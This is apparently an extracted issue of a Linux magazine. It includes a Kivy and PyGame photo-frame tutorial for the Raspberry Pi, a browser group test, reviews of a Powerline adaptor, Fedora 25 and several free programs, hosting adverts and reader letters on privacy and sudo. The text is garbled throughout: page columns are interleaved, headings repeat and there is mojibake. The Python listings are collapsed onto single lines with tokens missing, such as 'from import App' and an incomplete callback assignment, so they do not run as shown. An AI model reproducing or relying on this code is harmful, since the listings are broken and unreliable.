use. In this case, you would want to use the following code

in_file = open('filelist.txt') temp = in_file.readlines() in_file.close() filelist = [] for line in temp: filelist.append(line.strip()) We need to use the strip method because the readlines method of the file object includes the newline character at the end of each line. We need to remove these before we can use them later on when we go to load the images. The next step is to actually display the images. The simplest method is to just pop them up on the screen, one at a time. But this is a bit boring. Instead, we could use the available Carousel object to handle transitioning the images from one to another. The following code shows how to create this type of display.

sudo pip install kivy) The commented section of this core code is where we will need to put all of the


import kivy from import App from kivy.uix.image import Image

from kivy.uix.carousel import Carousel from kivy.clock import Clock class PhotoFrameApp(App): carousel = Carousel(direction='right', loop='true') def my_callback(self,dt): self.carousel.load_next() def build(self): # Use the filelist generation method of choice for curr_image in filelist: image = Image(source=curr_ image) self.carousel.add_ widget(image) Clock.schedule_interval(self. my_callback, 2.5) return self.carousel if __name__ == '__main__': PhotoFrameApp().run() In the previous code, the carousel object was set to loop. This means that when you reach the end of the list of images, it will simply loop back around to the beginning of the list, continuing forever. The next portion defines the callback for the updating of the carousel. It simply calls the 'load_next()' method of the carousel to pull up the next image on the list. In the 'build()' method, the first step is to create the list of image filenames. You could use either of the methods suggested earlier, or one of your own devising. Once you have that list, you can loop through each of them and create a new Image object for each of them. These new Image objects are added to the carousel with the 'add_widget()' method. The last step in the 'build()' method is to create a schedule using the Clock object. Using the 'schedule_ interval()' method, this code will change the image every 2.5 seconds. This method is good as a first start, but what if you want a more interesting transition between images? This can be done by using another set of classes called Screen and ScreenManager. If your list of images don't take up too much RAM, you can simply create a new Screen object

Python column

Can you use PyGame instead? for each image. The following code is an example of how you could do this:

import kivy from import App from kivy.uix.image import Image from kivy.uix.screenmanager import Screen,ScreenManager,FadeTransition from kivy.clock import Clock class PhotoFrameApp(App): sm = ScreenManager(transition=Fad eTransition()) curr_screen = 0 num_screens = 0 def my_callback(self,dt): = str(self. curr_screen) if self.curr_screen == self. num_screens-1: self.curr_screen = 0 else: self.curr_screen = self.curr_ screen + 1 def build(self): # Create the list of files in list filelist self.num_screens = len(filelist) for i in range(self.num_ screens): image = Image(source=filelist[i]) screen = Screen(name=str(i)) screen.add_widget(image) Clock.schedule_interval(self. my_callback, 2.5) return if __name__ == '__main__': PhotoFrameApp().run() As you can see, there is a bit more involved in creating the screens and adding the images than in the previous example. When you loop through the list of image files, you need to create a new Image widget. You then create a new Screen widget and add the Image widget as a child. The last step is that you need to add the new Screen widget to the ScreenManager object that was created at the top of the class. We reuse the 'schedule_interval()' method to

have the screens transitioning every 2.5 seconds. The callback function needs to be changed, though. The ScreenManager has an attribute, named 'current', that identifies which screen is the one being displayed. When you change what is identified by the current attribute, the two images are changed using the transition method that was defined when you created the ScreenManager object. If you are using the latest version of Kivy, there is a new method available, called 'switch_to()'. In this case, you don't need to add the Screen objects as widgets to the ScreenManager object. The 'switch_to()' method removes the current displayed screen and adds the new screen, applying the transition method being used. The version of Kivy available in the Raspbian package repository is older, so weâ&#x20AC;&#x2122;ve used the older method for managing screens. The previous example used the FadeTransition method to move from one screen to another. The other transitions available are, variously, NoTransition, SlideTransition, SwapTransition, WipeTransition, FallOutTransition and RiseInTransition. If you want to have even more variety in your image display, you can change the transition method for each method by changing the attribute 'transition' for the ScreenManager object. This code only displays the images, but that isn't the only thing you can do. You could also create an interactive photo frame that you can use to manipulate the pictures, if you have a touch screen as the display. As the code is written above, you can swipe back and forth to display other images. If you remove the 'Clock.schedule_ interval()' command, then the image display will stay static unless you swipe to change the image being displayed. Also, there is a widget, called 'Scatter', that you can load the picture into before adding to the screen objects. The Scatter class allows you to use multi-touch to rotate the image, stretch it or shrink it. This might be handy if you wanted to create a photo album application rather than a photo frame display. Hopefully, this has sparked some interest in looking at what can be done with such a powerful framework.

Of course, Kivy is not the only framework that you could use to create this image display. As another example, we will look at how you could use PyGame to do a similar job of showing a series of photos on a Raspberry Pi display.

import pygame pygame.init() display_width = 800 display_height = 600 gameDisplay = pygame.display.set_ mode((display_width,display_height)) black = (0,0,0) white = (255,255,255) clock = pygame.time.Clock() # Create the filelist image list def img_swap(x): gameDisplay.blit(filelist[x], (0,0)) finished = False x=0 while not finished: for event in pygame.event.get(): if event.type == pygame.QUIT: finished = True gameDisplay.fill(white) img_swap(x) pygame.display.update() if x == len(filelist)-1: x=0 else: x = x+1 clock.tick(60) pygame.quit() quit() As you can see, this code is a bit more low-level. The commented line is where you would place the code that creates the list, named 'filelist', that has the filenames for all of the pictures that you wanted to use as part of the display. To display the image is a two-step process. You first need to fill the window with white to essentially erase the currently displayed image. Then the function 'img_ swap()' uses the 'blit()' method to copy the image data to the physical display. Again, to keep the code simple, we used (0,0) as the origin to start the drawing of the image. But this means that all of the images are displayed in the bottom left-hand corner. You would probably want to add code to the function in order to figure out the coordinates to use as an origin to put your image in the centre of the window. PyGame also has a clock object that you can use to trigger the swapping of the images on a regular schedule.


From the makers of

Python The

Discover this exciting and versatile programming language with The Python Book. You’ll find a complete guide for new programmers, great projects designed to build your knowledge, and tips on how to use Python with the Raspberry Pi – everything you need to master Python.

Also available…

A world of content at your fingertips Whether you love gaming, history, animals, photography, Photoshop, sci-fi or anything in between, every magazine and bookazine from Imagine Publishing is packed with expert advice and fascinating facts.


Print edition available at Digital edition available at

81 Group test | 86 Solwise PL-1200AV | 88 Fedora 25 | 90 Free software






Web browsers

Is Chrome still the cream of the crop when it comes to modern, open-source web browsing?




Midori is considered one of the fastest, cutting edge browsers out there, offering users the latest web tech and extension system to help make the browser their own. It’s comparable to Chrome in a lot of ways, but does it do enough to stand out from its shadow?

The continuous developments behind Chrome have helped it become one of the biggest most widely used web browsers today. Combining simplicity with usability has been at the heart of its growth, but it’s also helped propel its competition to improve dramatically as well.


One of the reasons Firefox’s reputation continues to grow is due to its customisation offerings. Many parts of the browser can be tailored to suit your needs, and because of it, there’s been some fantastic spin off products made. Can it claim top spot in this group test, however?

QupZilla introduces some interesting concepts. It uses a unified library mode, helping keep your bookmarks, history and RSS feeds in a single window. Plus, with AdBlock integrated as standard, could QupZilla cause an upset for its bigger rivals?



Web browsers



Lightweight, fast and always on the cutting edge of web developments

Is the king of browsers still managing to hold on to its crown?

n Midori will work a vast selection of search engines, with an installer on hand to help you switch when necessary

n Extensions vary in their use, with some acting as standalone functions and others offering links to current apps

Browser design

Browser design

The coding behind Midori is fantastic, giving it a beautiful design throughout. Everything from bookmarks to tabs is controlled through a single menu, so you won’t find any complex windows to navigate through. Best of all, its design carries through each and every Linux distribution, so you’re guaranteed the same experience every time.

From the outset, Chrome looks like a relatively minimal browser, utilising a single bookmark manager as its single standout noticeable feature. One caveat is that it does get a little complicated when you start digging through its menu systems, of which there any many. You’ll find everything you could need for a good browsing experience buried here, however.

Web performance

Web performance

Management and settings

Management and settings

Speed is of the essence, and we’d go on record and say it’s faster than Chrome. At its core is a lightweight webkit rendering engine, which makes loading speeds lightning-quick. It’s even above average for image and videoheavy webpages, so it’s a great all-rounder. Midori really shows off the benefits of what a lightweight design can do for performance.

Having the power of Google behind it has helped Chrome tremendously. Whatever you throw at it is handled with the utmost ease, no matter the media content within. What’s particularly enjoyable about using Chrome is how it deals with older websites, performing on-the-spot checks for corrupt code and altering the loading process to cater for it.

Many of Midori’s core settings are ideal for tailoring privacy, but there’s little on offer for browser security. It’s an annoyance, but it would counteract the browser’s lightweight build. We did like, however, Midori’s bookmarking suite, which can be used to tailor for different site combinations and even create a quick load list.

Chrome has one of the best bookmark management tabs out there, enabling them to be integrated throughout your desktop and beyond. Alongside that, its History tab is packed with great features to help manage previously visited sites with ease, and even export them if needed. The amount of choice on offer is a bit overwhelming for new users, however.

Plugins and extras

Plugins and extras

One of the better extras on offer in Midori is its built-in downloader, a perfect accompaniment when it comes to on-the-spot file downloads. It can be a little clunky with media files, but it’s a small issue. Other extras are minimal in choice, but both the RSS feed manager and spell checker are helpful additions for most users. There’s room for more options here, however.

We’d say that part of Chrome’s appeal is through its experimental feature page. There’s a lot of developmental features here that can be integrated into your browser. Of course, some of them can make your browser unusable, but some are fantastic additions. Away from that, Chrome’s Web Store has some impressive tools that can also be implemented into the browser.



Midori burns up the rest of the field when it comes to its speed, and while a few options are missing, this is a lightweight distribution that seriously challenges Chrome’s crown in most areas.



Chrome still remains one of the best browsers out there. With the Google juggernaut behind it, updates are thick and fast, keeping up to date with the latest must-have web trends.



Mozilla’s browser continues to make waves in its field


Fairly new on the scene, does QupZilla deliver a great browsing experience?

■ Add-ons allow you to customise how some of the core functions with Firefox actually work. They vary in their success and usability

■ Native ad-block support is great and even better is that users can configure the blocker to their exact tastes and requirements

Browser design

Browser design

Out of all the browsers featured here, Firefox takes the most time to get used to. That’s not to say it’s bad by any means, but a lot of core tools are in different locations than some users would normally think to look for them. However, several of the browser’s key components can be customised, which is a big plus when compared to the competition.

Web performance

Firefox’s performance is generally impressive, but it can feel a little sluggish at times. The crux of this issue usually stems from the plugin menu, which you’ll need to keep a close eye on. Despite this, Mozilla’s backing does help Firefox’s reputation as one of the more file-friendly browsers out there, so integrating your day-to-day life with the web is easier than you might think.

Management and settings

Managing your various social accounts through one menu within Firefox is a particular highlight, and we wish it was something that other browsers looked to implement into their offerings. Settings choices aren’t as fully featured as those that Chrome offers, which we do actually prefer, but those wanting to experiment with their browser may be left disappointed.

Plugins and extras

QupZilla’s core design utilises many elements from some of the other browsers featured here. That’s not a bad thing by any means, but it’s hard to pinpoint the areas that really help make it stand out from the crowd. The minimal design is easy to navigate, menu systems are easy to identify and tools are labelled correctly. We just wish there was some more originality here.

Web performance

Browsing the web is a pleasure with QupZilla, with loading speeds not hindered by pointless animations and other superfluous extras. What we would recommend, however, is that you avoid the custom theme library, as we found some issues with the browser crashing when we looked to implement one of them. Apart from that, all is good here.

Management and settings

QupZilla unifies bookmarks, history and RSS feeds into one place, doing away with multiple windows. For end users, it proves to be a helpful addition, allowing complete control of the ins and outs of the browser in one place. Another nice addition is the ability to import bookmarks from other browsers, despite it being a little buggy at times.

Plugins and extras

Firefox offers its Private Browsing with Tracking Protection combo as a one-stop tool to help you browse the web anonymously, and in practice, it works an absolute treat. We also really liked its intelligent search system that looks to utilise its knowledge on your searches and site visits to recommend things that you may want to view and read.

There aren’t too many extras to speak of in QupZilla, but a couple do shine through. Integrated ad-blocking software is a featured point of the browser, enabling users to identify the sites they’d like to prevent displaying adverts. There’s also a self-styled ‘speed dial’ that can be used to load webpages faster, but again, it was a little buggy during testing.



A lot of Firefox’s extras will be a big incentive for users to check out, and rightly so. It does miss some core settings we’d like to have seen, but this is still a highly usable browser.


Despite some positives, QupZilla still has some annoyances in other areas. We must point out that this is still a growing project, and we recommend paying close attention to it over the coming months.

7 83


Web browsers

In brief: compare and contrast our verdicts Midori Browser design

A crisp and clean design carries through well on a host of Linux distributions

Web performance

Capable of fast loading times thanks to its lightweight build qualities

Management settings

Tailored for privacy, but lacking in core browser security for the most part

Plugins and extras

Lacking in certain options, but a built-in downloader is a great added bonus


A few omissions here and there, but this is the closest Chrome beater we’ve found



Minimal from the outset, but overly complicated when digging through the settings


Deals with any task with consummate ease, especially older websites that lack advanced code


Chrome sports one of the best bookmark and history management windows out there


Hundreds of experimental features are on hand so you can experiment with Chrome’s capabilities


The gap between Chrome and other browsers is getting smaller, but it’s still the king here



Its design is a little different from the rest, which can take a little time to get accustomed to


While integrating files into Firefox is simple, it can feel a little sluggish from time to time


Settings are more refined than other browsers, with only the best options showcased



A handy Privacy Browsing and Tracking Protection combo is a particular highlight here Firefox is a solid alternative to Chrome, but we do prefer what Midori offers



A blend of other browser features helps give QupZilla a good look overall



Browsing speeds are fast, as long as you avoid the slowdownridden custom themes



QupZilla unifies your bookmarks, RSS feed and web history in one manageable menu



Integrated ad-blocking software is useful, but you can find extensions that are better



A functional browser that’s missing the wow factor that other browsers have



Yes, Chrome is still the best browser around, but it’s nowhere near as superior as it once was. One of the best things about doing this group test was being able to see first-hand how major developments in opposing browsers is quickly closing the gap on Google’s juggernaut. Midori was a particular highlight, offering a relatively minimal take on the browsing experience, while still boasting an impressive suite of features and quick loading times. We’d love to revisit this group in six months and see if anything has changed. As it stands, Chrome still sits at the top of the pile. While its core browsing experience isn’t anything out of this world, it’s the embedded extras that really set it apart. For one, the Chrome Web Store has come on leaps and bounds in recent years, with thousands of extensions now available for users to expand on their Chrome experience. Best of all, many of these are completely free and offer quick links to some of your most used apps. Similarly, for budding tinkerers out there, the experimental features menu remains a hidden treasure trove. While many of these features aren’t yet ready for public consumption, some can be integrated into the browser with absolute ease.


n Implement extensions to improve and expand on your current Chrome experience

What’s even better is that some of these can be edited and tailored to your own Chrome download, so the choice is really down to you. Chrome has held off against some stiff competition in its time, and it’s testament to the continued support from Google that it remains at

the top. Frequent updates are helping plug any holes, while a growing community is helping to provide instant feedback and bug reports when needed. Midori is a worthy runner-up, but it’ll take some doing to dethrone the king. Oliver Hill

01202 586442

To advertise in

Contact us on 01202 586442

Classified Advertising


Solwise PL-1200AV2-PIGGY


Solwise PL-1200AV2-PIGGY Faster and more reliable than Wi-Fi, this advanced Powerline adaptor is ideal for 4K streaming


£47 each



Qualcomm Atheros QCA7500 chipset Pass-through socket with noise filter 28-bit AES Link Encryption


Home networks are facing growing demands as 4K media streaming home servers, games consoles and an ever-increasing number of internet-connected devices become commonplace, while our walls stay as thick as ever. While AC Wi-Fi routers offer one way to bolster signal, and Ethernet cables are there for those that want to snake cables through their houses, Powerline adaptors offer a third way. For those unfamiliar with Powerline (also known as HomePlug), this technology turns your home’s electrical wiring into a network, transmitting data packets through the higher frequencies your wires support and your 50/60Hz

electrical power isn’t using. Solwise’s PL-1200AV2-PIGGY Powerline adaptor is up there, promising Gigabit speeds with transfer rates up to 1200Mbps. During our speed tests, we found the adaptor didn’t quite live up to these grand claims, but still managed to trounce our home Wi-Fi, with setup that couldn’t be simpler. The PL-1200AV2 uses the latest Qualcomm Atheros QCA7500 chipset, designed specifically for Powerlines, and offers enhanced processing power, employing MIMO (multiple input multiple output), which offers eight spatial streams, the same as an AC router. This means it has much more spectral bandwidth to play around with, which

Pros Easy to set up and pair, it boasts some high-end features for a reasonable price and delivers impressive performance

It has much more spectral bandwidth to play around with, which allows it to deliver larger data streams, making it ideal for 4K Netflix allows it to deliver larger data streams, making it ideal for 4K Netflix. The PL-1200AV2 also has two Gigabit Ethernet ports, so that you can run multiple devices off the one adaptor. These are located on the bottom of the adaptor, which is arguably more aesthetically pleasing, but isn’t quite as easy to access. Unlike some Powerline accessories, this adaptor also has a pass-through socket, so you can continue to use it as a power source (Apparently, this is the source of the ‘PIGGY’ name; it’s like ‘piggyback’). The pass-through socket is also filtered to help reduce mains noise, if that’s something that bugs you. Something of more significance, though, the PL-1200AV2’s security is supported by 128-bit AES Link Encryption to keep out eavesdroppers and hackers. However, while some similarly priced Powerline adaptors, including models from Devolo and TP-Link, include a Wi-Fi transmitter so you can create a hotspot around your socket, this is a feature sadly lacking from the PL-1200AV2. Setting up the PL-1200AV2 is almost a case of plugand-play thanks to the QuickConnect button. Like any Powerline network, you require at least two adaptors (so expect to pay £94 to start using the PL-1200AV2, rather

than just £47). Plug one into the socket nearest your router, which you can then hook up to the internet using one of the Ethernet ports. Place your second adaptor anywhere in your house where you will need reliable internet. Then you have the option to use Solwise’s free installation software to set up a network, but it’s much easier to just press the button on the PL-1200AV2 to pair them and watch the LEDs flicker to confirm it. As we said, in terms of actual performance, our speed test results were nothing like the 1, 200Mbps promised on the box. We didn’t actually expect this, as that’s a theoretical max speed only. The reality was 385Mbps, which we still consider impressive when compared to the 20 to 90Mbps Powerline tech was offering just a couple of yearsago.Themaxpingwas3ms,whichwillnodoubtappeal to online gamers. The PL-1200AV2 also uses enhanced Quality of Service (QoS), so it will prioritise bandwidth for multimedia payloads – like online gaming, 4K TV and VoIP calls – for smoother streaming. However, the advantage of Powerline is not really speed, but distance. You can use one PL-1200AV2 adaptor on your ground floor and another in your attic without worrying about loss of signal. Jack Parsons

Cons In our tests, it didn’t deliver anywhere

near the maximum 1, 200Mbps speed. You’ll also need to shell out for at least two adaptors for it to work

Summary While it doesn’t live up to its name’s claim, the Solwise PL-1200AV2-PIGGY delivers near 400Mbps speeds that are still incredibly impressive. It’s also almost a third of the price of many Gigabit Powerline adaptors, while still offering high-quality features, including its Atheos processor, added encryption and enhanced QoS.




Fedora 25


Fedora 25

Can Fedoraâ&#x20AC;&#x2122;s latest update turn the tables on the competition?


Storage 10GB drive space (20GB recommended)

Specs 1GHz processor (1.4GHz recommended)


For many users coming over to Linux for the first time, Fedora has been one of the leading lights to help guide them on their path. Notorious for being highly usable and boasting a fantastic community, continuous developments have helped propel it to one of the premier offerings available for download. Its latest release, Fedora 25, blends together a suite of new features, mixed in with some improvements to help core stability as well. As ever, Fedora has released three editions of the distribution, each tailored to a specific use and

stemming from a base package. Fedora 25 Atomic Host (replacing Cloud), Server and Workstation have all had some noticeable enhancements. Each edition has an underlying foundation of features that they all use in their own way. One of these inclusions is Docker 1.12 integration, which finally makes the transition across to Fedora. Itâ&#x20AC;&#x2122;s an ideal solution for building and running container-based applications, and benefits from the low-resource build of each edition of Fedora. One of the issues in previous versions of Fedora was its

Docker 1.12 integration finally makes the transition across to Fedora sometimes problematic system programming language, but we’re glad to say this is a thing of the past thanks to the inclusion of Rust. Albeit not overly well-known, Rust’s integration helps eradicate any and all stability issues faced previously; another welcome addition, we must say. Moving into Fedora Workstation, arguably the biggest addition here is with GNOME 3.22. There’s an abundance of subtle interface improvements, and we particularly like the all-new keyboard settings tool. For developers making changes on the fly, this is a helpful asset to have around. Window management has also seen some enhancements, and while cosmetically you’ll be hard pressed to really spot any differences, being able to multi-select files and systematically edit metadata through certain key bindings proves to be a big help. You’ll also now find decoding support for MP3 files, but this seemed to be hit-and-miss with its end results during our time with it. Thankfully, users can find alternatives for download through the software centre. Fedora Server’s faithful Cockpit system has seen a variety of changes, with a new SELinux Troubleshooter module on hand to help diagnose problems. Due to the complexities of Server as a whole, this module is ideal for finding and fixing faults effortlessly. There were a few instances when we relied on SELinux to figure out an issue and it solved it with consummate ease. The jury is still out on how it’ll handle more advanced failures,

however. Dig a little deeper and users can also find admin support for SSH keys, enabling users to systematically track connected machines at any time. We did find some initial slowdown with this feature, but to our knowledge, this seems more a hardware fault than anything with the software itself. Fedora Atomic is an entirely new flavour for Fedora and first impressions are positive. There are ways throughout to help create and deploy container-based workloads, linking in well with the Docker integration mentioned previously. While this edition perhaps lacks the high-quality Fedora finish we’ve become accustomed to, a two-week update cycle is a surprising and welcome twist. We’ll reserve judgement until the first point updates have been released. We have to say that the Fedora team has seriously done a tremendous job here. Each of these editions has upped our expectations of what Fedora is capable of, and despite some small flaws, it certainly feels like a near-complete update. The premise of dropping Fedora Cloud and subbing in Fedora Atomic is a potentially risky move, but early signs are that Atomic is certainly up to scratch. If you’ve been biding your time to check out Fedora, now is the perfect time to do so. Beginner users should arguably start by using Workstation to get used to the nuances that Fedora offers, while advanced users should pick and choose the edition that suits them best. Oliver Hill

Pros Most new additions have

dramatically improved the user experience, with bug fixes helping to fix previous problems.

Cons Integration of certain tools can be

hit-and-miss and we’d love to see more crossover between the three distinct versions of Fedora 25.

Summary Core changes to the Fedora brand are fantastic and while none are perfect, each individual addition is certainly worth taking the time to check out.




Free software


0 A.D. Alpha 21 Ulysses

From Carthaginians to Romans, rewrite ancient history

If you ever doubt that the human race takes play seriously, take a look at the amount of hours that go into the collaborative development of open source games. Since the previously access-to-code-byinvitation game was relicensed under the GNU GPL in 2009 development has accelerated, and releases have been made regularly. 0 A.D. is still in alpha, but it’s very playable, and well worth investing a little time in, whether you like RTSes, or are just interested in this historic period. Unlike computing, calendars count from 1, and there was no year zero - hence the licence to adopt the name, and play a little fast and loose with history, where gameplay demands sacrifices in accuracy. The interface lets you get straight to playing, with sensible defaults already selected, so that there is no need to make decisions about things you don’t yet understand. The in-game manual will also help to keep you Above You start with an acropolis, and resources nearby, but will you emulate the success of ancient Athens? going as you marshall resources, and build alliances, to try and emerge victorious on the Attic plains. Players need to keep on top of military campaigns Great for… A lot of yet-to-be implemented Good graphics, sound, and and defence, while building up enough resources to Having fun while pretending to features, so you may be game progression. Online be learning history advance from village to town – and eventually city – playing Age of Empires for a multiplayer options. Regular unlocking technological advances along the way. little while yet. improvements and updates.




Quil 2.5.0

Art from code, and it can run in your browser, too Normally we have a screenshot for graphics apps that we review, but since Quil is a library for interactive drawings and animations, the page won’t bring them to life as well as you visiting the project’s homepage or, better yet, running the software. Why would you? Well, Quil mixes Processing – an artistfriendly API – with Clojure, a language so hot that you’re seriously running out of excuses not to at least give it a try. Real soon. As with all things Clojure, Lein makes for the simplest of installs – lein new quil my-sketch, then open the generated core.clj file up in your favourite Clojure friendly editor (Emacs or Lighttable), and evaluate the file. The website is full of examples, as


well as links to tutorials, and a chance to try online. Speaking of online, Quil also works with ClojureScript (using Processing.js), so sketches can be run directly in your web browser. If you know Processing, it’s a little disconcerting to see it getting an attack of the parentheses to fit the Clojure world, but the examples are helpful here in getting you acclimatised – try Grey Circles on Quil’s GitHub page. Quil can be expanded with middleware, such as Navigation 3D, which allows shooter-like navigation through 3D spaces. Sketches can also be made into runnable jars, for carrying to anywhere running the JVM. Fun and useful, what more could you want?

Pros Update functions (and therefore animations) without restarting; make art from maths!

Cons It’s not pure Processing, and

Clojure is a big shock to newbies (until they love it!).

Great for…

Enlivening presentations and pepping up websites


Samhain 4.2.0

Don’t rely on luck to protect your servers - install a host-based intrusion detection system

Security - you know you need it, but something always gets in the way. If you have one, two or a handful of VPSes, and perhaps an internet-facing server or two at home – don’t forget to count that Raspberry Pi project - you’ll have at least thought about security, probably even have a firewall, and maybe even do daily software updates, but you’ll have been far too busy to get serious about Intrusion Detection software. Well, stop prevaricating, postponing and procrastinating, and take a look at Samhain. One of the best host-based intrusion detection systems (HIDS), Samhain sits stealthily on your system monitoring packets and detecting file modifications – as well as searching for rootkits

and detecting rogue SUID executables. It can run as a standalone monitor on a single server, or monitor multiple hosts, logging centrally – with all logs sent signed and encrypted, naturally. Packages are in most repositories, but distros may have compiled Samhain without a feature you need, so consider downloading the source; Samhain provides instructions for checking its integrity. Dependencies are minimal for reasons of security, but it makes for an easy compile. The real work starts when you open /etc/ samhainrc in your favourite editor: time to read through the weighty manual. The terse man page is a useful guide to many parts of Samhain, including running in stealth mode, with config hidden by steganography.

Pros Powerful and flexible Intrusion

Detection System; the only serious rival to OSSEC.

Cons To get the most from it you’ll have to spend a lot of time reading the comprehensive manual.

Great for…

Stop worrying about your server, and sleep soundly!


lterm 1.4.1

Manage all of your remote terminal sessions with lterm If you regularly shell into remote machines, but are not using a tool for transparent sessions across networks like MC or Emacs’ TRAMP mode, then you may be fed up of dealing with remembering the log-in details, and the extra work involved in file transfers. Enter lterm, a terminal emulator based on VTE with plenty of features to make you life easier. As well as the standard bells and whistles of tabbed sessions, working remotely (SSH, sftp, or even telnet) is facilitated by bookmarks, encrypted password saving (and authentication by key), and remote file and directory management. X11 forwarding can also be carried out over SSH sessions. There are some editing features, and plenty of configuration options such as customised mouse behaviour, for those with a particular way of working. Additionally, users can send the same commands to clusters of remote servers or local desktop sessions - which is also an excellent way to step through parts of a shell script for careful testing of its effects on your servers. Very useful. Fairly regular releases, with attention to bug fixes as well as new features, means users can be confident that time invested in this app will not be squandered.

Above lterm takes the pain out of remote working, giving you the best features of command line and GUI

Pros Combines a good basic

terminal client with convenient, time-saving features for working across networks.

Cons It’ll never be as powerful as working across machines from Emacs, MC, etc – but does it need to be?

Great for…

Anyone with a remote session from VPS to Raspberry Pi.



Get your listing in our directory To advertise here, contact Luke | +44 (0)1202586431


Hosting listings Featured host: 0845 527 9345

About us

Cyber Host Pro are committed to provide the best cloud server hosting in the UK; we are obsessed with automation and have been since our doors opened 15 years ago! We’ve grown year on year and love our solid growing customer base who trust us to keep their business’s cloud online!

What we offer

• Cloud VPS Servers – scalable cloud servers with optional Cpanel or Plesk control panel. • Reseller Hosting – sell web and email hosting to your clients; both Windows and Linux hosting available. • Dedicated Servers – having your own

If you’re looking for a hosting provider who will provide you with the quality you need to help your business grow then contact us to see how we can help you and your business! We’ve got a vast range of hosting solutions including reseller hosting and server products for all business sizes.

dedicated server will give you maximum performance; our UK servers typically include same-day activation. • Website Hosting – all of our web hosting plans host on 2015/16 SSD Dell servers giving you the fastest hosting available!


5 Tips from the pros


Optimise your website images When uploading your website to the internet, make sure all of your images are optimised for websites! Try using jpegmini. com software, or if using Wordpress install the EWWW Image Optimizer plugin.


Host your website in the UK Make sure your website is hosted in the UK, not just for legal reasons! If your server is overseas you may be missing out on search engine rankings on – you can check where your site is on www.


Do you make regular backups? How would it affect your business if you lost your website today? It is important to always make your own backups; even if your host offers you a backup solution


Having your own dedicated server will give you maximum performance; our UK servers typically include same-day activation

it’s important to take responsibility for your own data.


Trying to rank on Google? Google made some changes in 2015. If you’re struggling to rank on Google, make sure that your website is mobile-responsive! Plus, Google now prefers secure (https) websites! Contact your host to set up and force https on your website.


Avoid cheap hosting We’re sure you’ve seen those TV adverts for domain and hosting for £1! Think about the logic... for £1, how many clients will be jam-packed onto that server? Surely they would use cheap £20 drives rather than £1k+ enterprise SSDs! Try to remember that you do get what you pay for!

Chris Michael “I’ve been using Cyber Host Pro to host various servers for the last 12 years. The customer support is excellent, they are very reliable and great value for money! I highly recommend them.” Glen Wheeler “I am a website developer, I signed up with Cyber Host Pro 12 years ago as a small reseller, 12 years later I have multiple dedicated and cloud servers with Cyber Host Pro, their technical support is excellent and I typically get 99.9-100% uptime each month” Paul Cunningham “Me and my business partner have previously had a reseller account with Cyber Host Pro for 5 years, we’ve now outgrown our reseller plan, Cyber Host Pro migrated us to our own cloud server without any downtime to our clients! The support provided to us is excellent, a typical ticket is replied to within 5-10 minutes! ”

Supreme hosting

SSD Web hosting 0800 1 777 000 0843 289 2681

CWCS Managed Hosting is the UK’s leading hosting specialist. They offer a fully comprehensive range of hosting products, services and support. Their highly trained staff are not only hosting experts, they’re also committed to delivering a great customer experience and passionate about what they do.

Since 2001 Bargain Host have campaigned to offer the lowest possible priced hosting in the UK. They have achieved this goal successfully and built up a large client database which includes many repeat customers. They have also won several awards for providing an outstanding hosting service.

• Colocation hosting • VPS • 100% Network uptime

Value hosting 02071 838250 ElasticHosts offers simple, flexible and cost-effective cloud services with high performance, availability and scalability for businesses worldwide. Their team of engineers provide excellent support around the clock over the phone, email and ticketing system.

Enterprise hosting: | 0800 808 5450 Formed in 1996, Netcetera is one of Europe’s leading web hosting service providers, with customers in over 75 countries worldwide. As the premier provider of data centre colocation, cloud hosting, dedicated servers and managed web hosting services in the UK, Netcetera offers an array of

services to effectively manage IT infrastructures. A state-of-the-art data centre enables Netcetera to offer your business enterpriselevel solutions. • Managed and cloud hosting • Data centre colocation • Dedicated servers

• Cloud servers on any OS • Linux OS containers • World-class 24/7 support

Small business host 0800 051 7126 HostPapa is an award-winning web hosting service and a leader in green hosting. They offer one of the most fully featured hosting packages on the market, along with 24/7 customer support, learning resources, as well as outstanding reliability. • Website builder • Budget prices • Unlimited databases

• Shared hosting • Cloud servers • Domain names

Value Linux hosting 01642 424 237 Linux hosting is a great solution for home users, business users and web designers looking for cost-effective and powerful hosting. Whether you are building a single-page portfolio, or you are running a database-driven ecommerce website, there is a Linux hosting solution for you. • Student hosting deals • Site designer • Domain names

Budget hosting:

Fast, reliable hosting | +49 (0)9831 5050 Hetzner Online is a professional web hosting provider and experienced data centre operator. Since 1997 the company has provided private and business clients with high-performance hosting products as well as the necessary infrastructure for the efficient operation of websites. A combination of stable technology, attractive pricing

and flexible support and services has enabled Hetzner Online to continuously strengthen its market position both nationally and internationally. • Dedicated and shared hosting • Colocation racks • Internet domains and SSL certificates • Storage boxes 01904 890 890 Founded in 2002, Bytemark are “the UK experts in cloud & dedicated hosting”. Their manifesto includes in-house expertise, transparent pricing, free software support, keeping promises made by support staff and top-quality hosting hardware at fair prices. • Managed hosting • UK cloud hosting • Linux hosting



Your source of Linux news & views

Contact us…


Your letters

Questions and opinions about the mag, Linux, and open source

Above Make sure that you are the only one in full control by using sudo and su instead of root wherever possible

Above MOFO Linux is an Ubuntu-based distro for those who are concerned about surveillance and censorship

Privacy please

Dear Linux User, It strikes me that, given the recent introduction of the so-called ‘Snooper’s Charter’ in the UK, the frankly ridiculous data breaches at Yahoo et al, and the constant news stories surrounding hackers, you should talk more about how ordinary users can protect our private data from those who want to get their hands on it. Nice shiny versions of Linux like Apricity and elementary, as featured in your recent issue, are all very well, but can they stand up to a dedicated mischiefmaker or state actor? I think not. Some guidance on Linux versions that can would be very much appreciated, not only by myself and others who are worried about our financial and data security, but for those in places where Big Brother’s watchful eye is a very real and present threat. Colin Farwig


Computer security has rarely been out of the news lately, which is why we decided to take an in-depth look at InfoSec this issue! But while our feature is packed with ways to lock down and test systems and networks, it’s geared more towards the sysadmins of the world and less to home users, who may not have either the time or the inclination to watch over logs and pen-test their own security strategies. Happily, there are some very good Linux distros out there that concentrate on privacy – the reason that we don’t include them on our disc is that, for maximum security, you are better off downloading and checking them yourself before installation. Tails ( is the most well known privacy focused distro, Qubes OS ( is another – Edward Snowden apparently swears by it. MOFO Linux ( meanwhile, is especially designed to counteract state surveillance and

censorship, for those in countries where this is a concern. The good thing about the latter is that it’s Ubuntu-based, so it works smoothly and offers an easy learning curve, making it suitable for those who aren’t technically adept but still need to protect their privacy.

Who do sudo?

Hello Linux User team, I’m new to Linux, so forgive me if this is a stupid question, but what is the difference between sudo and root? I get that root is the equivalent of the Windows or Mac administrator account, the one that can do everything, but sudo seems to allow just as much power over commands, yet I often read things that say it’s better to sudo something rather than root it. Surely they both essentially do the same thing? And if root is the administrator account that has all the power, why would you not use that? In Windows if you are anything less than an administrator you basically have barely any control over the system at all, so why would you ever




Linux User & Developer

